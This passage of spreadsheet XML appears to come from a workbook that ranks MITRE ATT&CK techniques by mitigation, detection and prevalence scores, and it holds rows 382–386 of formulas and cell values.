      </c>
      <c r="V382" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>8.5714285714285715E-2</v>
      </c>
      <c r="W382">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X382">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y382">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z382">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA382">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB382">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC382" s="29" t="s">
        <v>117</v>
      </c>
      <c r="AD382" s="25" t="str" cm="1">
        <f t="array" ref="AD382">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC382)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE382" s="25">
        <f>IF(AD382="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF382" s="25" t="str" cm="1">
        <f t="array" ref="AF382">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC382)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG382" s="25">
        <f>IF(AF382="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH382" s="25" t="str" cm="1">
        <f t="array" ref="AH382">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC382)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI382" s="25">
        <f>IF(AH382="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ382" s="25" t="str" cm="1">
        <f t="array" ref="AJ382">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC382)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK382" s="25">
        <f>IF(AJ382="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL382" s="25" t="str" cm="1">
        <f t="array" ref="AL382">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC382)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM382" s="25">
        <f>IF(AL382="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN382" s="59">
        <v>0</v>
      </c>
      <c r="AO382" s="51">
        <v>0</v>
      </c>
      <c r="AP382" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2248571428571427E-2</v>
      </c>
      <c r="AQ382" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.4161904761904762E-2</v>
      </c>
      <c r="AR382" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.4161904761904762E-2</v>
      </c>
      <c r="AS382" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT382" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU38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83" spans="1:47">
      <c r="A383" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2248571428571427E-2</v>
      </c>
      <c r="B383" s="25">
        <f>SUM(H383,M383,V383)*(1+SUM(AE383,AG383,AI383,AK383,AM383))</f>
        <v>0.22248571428571429</v>
      </c>
      <c r="C383" s="25" t="s">
        <v>1496</v>
      </c>
      <c r="D383" s="25" t="s">
        <v>114</v>
      </c>
      <c r="E383" s="25" t="s">
        <v>1497</v>
      </c>
      <c r="F383" s="51">
        <v>1</v>
      </c>
      <c r="G383" s="51">
        <v>1</v>
      </c>
      <c r="H383" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I383">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J383">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K383">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L383">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M383" s="25">
        <v>0</v>
      </c>
      <c r="N383" s="51">
        <v>0</v>
      </c>
      <c r="O383" s="51">
        <v>0</v>
      </c>
      <c r="P383" s="51">
        <v>0</v>
      </c>
      <c r="Q383" s="51">
        <v>0</v>
      </c>
      <c r="R383" s="52" t="s">
        <v>1275</v>
      </c>
      <c r="S383" s="51">
        <v>3</v>
      </c>
      <c r="T383" s="51" t="s">
        <v>1276</v>
      </c>
      <c r="U383" s="51">
        <v>6</v>
      </c>
      <c r="V383" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>8.5714285714285715E-2</v>
      </c>
      <c r="W383">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X383">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y383">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z383">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA383">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB383">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC383" s="29" t="s">
        <v>1498</v>
      </c>
      <c r="AD383" s="25" t="str" cm="1">
        <f t="array" ref="AD383">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC383)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE383" s="25">
        <f>IF(AD383="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF383" s="25" t="str" cm="1">
        <f t="array" ref="AF383">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC383)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG383" s="25">
        <f>IF(AF383="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH383" s="25" t="str" cm="1">
        <f t="array" ref="AH383">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC383)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI383" s="25">
        <f>IF(AH383="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ383" s="25" t="str" cm="1">
        <f t="array" ref="AJ383">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC383)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK383" s="25">
        <f>IF(AJ383="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL383" s="25" t="str" cm="1">
        <f t="array" ref="AL383">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC383)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM383" s="25">
        <f>IF(AL383="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN383" s="58">
        <v>0</v>
      </c>
      <c r="AO383" s="51">
        <v>0</v>
      </c>
      <c r="AP383" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2248571428571427E-2</v>
      </c>
      <c r="AQ383" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.4161904761904762E-2</v>
      </c>
      <c r="AR383" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.4161904761904762E-2</v>
      </c>
      <c r="AS383" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT383" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU38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84" spans="1:47" ht="32.1">
      <c r="A384" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2248571428571427E-2</v>
      </c>
      <c r="B384" s="25">
        <f>SUM(H384,M384,V384)*(1+SUM(AE384,AG384,AI384,AK384,AM384))</f>
        <v>0.22248571428571429</v>
      </c>
      <c r="C384" s="25" t="s">
        <v>1499</v>
      </c>
      <c r="D384" s="25" t="s">
        <v>205</v>
      </c>
      <c r="E384" s="25" t="s">
        <v>1500</v>
      </c>
      <c r="F384" s="51">
        <v>1</v>
      </c>
      <c r="G384" s="51">
        <v>1</v>
      </c>
      <c r="H384" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I384">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J384">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K384">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L384">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M384" s="25">
        <v>0</v>
      </c>
      <c r="N384" s="51">
        <v>0</v>
      </c>
      <c r="O384" s="51">
        <v>3</v>
      </c>
      <c r="P384" s="51">
        <v>1</v>
      </c>
      <c r="Q384" s="51">
        <v>0</v>
      </c>
      <c r="R384" s="52" t="s">
        <v>1325</v>
      </c>
      <c r="S384" s="51">
        <v>3</v>
      </c>
      <c r="T384" s="51" t="s">
        <v>1501</v>
      </c>
      <c r="U384" s="51">
        <v>4</v>
      </c>
      <c r="V384" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>8.5714285714285715E-2</v>
      </c>
      <c r="W384">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X384">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y384">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z384">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA384">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB384">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC384" s="29" t="s">
        <v>92</v>
      </c>
      <c r="AD384" s="25" t="str" cm="1">
        <f t="array" ref="AD384">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC384)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE384" s="25">
        <f>IF(AD384="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF384" s="25" t="str" cm="1">
        <f t="array" ref="AF384">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC384)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG384" s="25">
        <f>IF(AF384="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH384" s="25" t="str" cm="1">
        <f t="array" ref="AH384">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC384)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI384" s="25">
        <f>IF(AH384="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ384" s="25" t="str" cm="1">
        <f t="array" ref="AJ384">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC384)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK384" s="25">
        <f>IF(AJ384="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL384" s="25" t="str" cm="1">
        <f t="array" ref="AL384">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC384)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM384" s="25">
        <f>IF(AL384="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN384" s="59">
        <v>0</v>
      </c>
      <c r="AO384" s="51">
        <v>0</v>
      </c>
      <c r="AP384" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2248571428571427E-2</v>
      </c>
      <c r="AQ384" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.4161904761904762E-2</v>
      </c>
      <c r="AR384" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.4161904761904762E-2</v>
      </c>
      <c r="AS384" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT384" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU38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85" spans="1:47" ht="32.1">
      <c r="A385" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.4700000000000003E-2</v>
      </c>
      <c r="B385" s="25">
        <f>SUM(H385,M385,V385)*(1+SUM(AE385,AG385,AI385,AK385,AM385))</f>
        <v>0.24700000000000003</v>
      </c>
      <c r="C385" s="25" t="s">
        <v>1502</v>
      </c>
      <c r="D385" s="25" t="s">
        <v>1503</v>
      </c>
      <c r="E385" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F385" s="51">
        <v>1</v>
      </c>
      <c r="G385" s="51">
        <v>1</v>
      </c>
      <c r="H385" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I385">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J385">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K385">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L385">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M385" s="25">
        <v>0</v>
      </c>
      <c r="N385" s="51">
        <v>0</v>
      </c>
      <c r="O385" s="51">
        <v>18</v>
      </c>
      <c r="P385" s="51">
        <v>0</v>
      </c>
      <c r="Q385" s="51">
        <v>0</v>
      </c>
      <c r="R385" s="51"/>
      <c r="S385" s="51">
        <v>0</v>
      </c>
      <c r="T385" s="51"/>
      <c r="U385" s="51">
        <v>0</v>
      </c>
      <c r="V385" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>8.5714285714285701E-2</v>
      </c>
      <c r="W385">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X385">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y385">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z385">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>18</v>
      </c>
      <c r="AA385">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.18</v>
      </c>
      <c r="AB385">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.18</v>
      </c>
      <c r="AC385" s="29" t="s">
        <v>433</v>
      </c>
      <c r="AD385" s="25" t="str" cm="1">
        <f t="array" ref="AD385">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC385)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE385" s="25">
        <f>IF(AD385="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF385" s="25" t="str" cm="1">
        <f t="array" ref="AF385">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC385)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG385" s="25">
        <f>IF(AF385="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH385" s="25" t="str" cm="1">
        <f t="array" ref="AH385">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC385)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI385" s="25">
        <f>IF(AH385="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ385" s="25" t="str" cm="1">
        <f t="array" ref="AJ385">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC385)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK385" s="25">
        <f>IF(AJ385="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL385" s="25" t="str" cm="1">
        <f t="array" ref="AL385">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC385)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM385" s="25">
        <f>IF(AL385="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN385" s="51"/>
      <c r="AO385" s="51"/>
      <c r="AP385" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.4700000000000003E-2</v>
      </c>
      <c r="AQ385" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.2333333333333342E-2</v>
      </c>
      <c r="AR385" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.2333333333333342E-2</v>
      </c>
      <c r="AS385" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT385" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU38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86" spans="1:47" ht="32.1">
      <c r="A386" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.3817142857142855E-2</v>
      </c>
      <c r="B386" s="25">
        <f>SUM(H386,M386,V386)*(1+SUM(AE386,AG386,AI386,AK386,AM386))</f>
        <v>0.20483809523809526</v>
      </c>
      <c r="C386" s="25" t="s">
        <v>1504</v>
      </c>
      <c r="D386" s="25" t="s">
        <v>233</v>
      </c>
      <c r="E386" s="25" t="s">
        <v>1505</v>
      </c>
      <c r="F386" s="51">
        <v>1</v>
      </c>
      <c r="G386" s="51">
        <v>1</v>
      </c>
      <c r="H386" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I386">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J386">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K386">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L386">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M386" s="25">
        <v>0</v>
      </c>
      <c r="N386" s="51">
        <v>0</v>
      </c>
      <c r="O386" s="51">
        <v>3</v>
      </c>
      <c r="P386" s="51">
        <v>0</v>
      </c>
      <c r="Q386" s="51">
        <v>0</v>
      </c>
      <c r="R386" s="52" t="s">
        <v>423</v>
      </c>
      <c r="S386" s="51">
        <v>3</v>
      </c>
      <c r="T386" s="52" t="s">
        <v>1506</v>
      </c>
      <c r="U386" s="51">
        <v>4</v>
      </c>
      <c r="V386" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>8.0952380952380942E-2</v>
      </c>
      <c r="W386">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X386">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y386">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z386">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA386">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB386">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC386" s="29" t="s">
        <v>1507</v>
      </c>
      <c r="AD386" s="25" t="str" cm="1">
        <f t="array" ref="AD386">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC386)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE386" s="25">
        <f>IF(AD386="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF386" s="25" t="str" cm="1">
        <f t="array" ref="AF386">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC386)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG386" s="25">
        <f>IF(AF386="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH386" s="25" t="str" cm="1">
